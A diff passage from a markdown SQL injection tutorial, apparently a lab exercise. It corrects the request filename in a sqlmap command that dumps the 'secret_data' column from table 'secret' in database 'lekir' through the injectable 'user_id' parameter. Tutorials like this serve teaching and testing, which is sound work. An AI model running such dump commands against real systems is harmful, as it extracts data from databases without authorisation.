WhiteUsagi18/SQL-Injection-POST-request/SQLInjectionTutorial/SQLinjection.md

 Now, we can see that there are two columns in this table which are `secret_id` and `secret_data`.
 Lets dump the `secret_data` column to see what the data is.<br>

 `
-sqlmap -r post-request -p user_id -D lekir -T secret -C secret_data --dump `
+sqlmap -r post-request.txt -p user_id -D lekir -T secret -C secret_data --dump `

 ![image 9](./img/image9.png)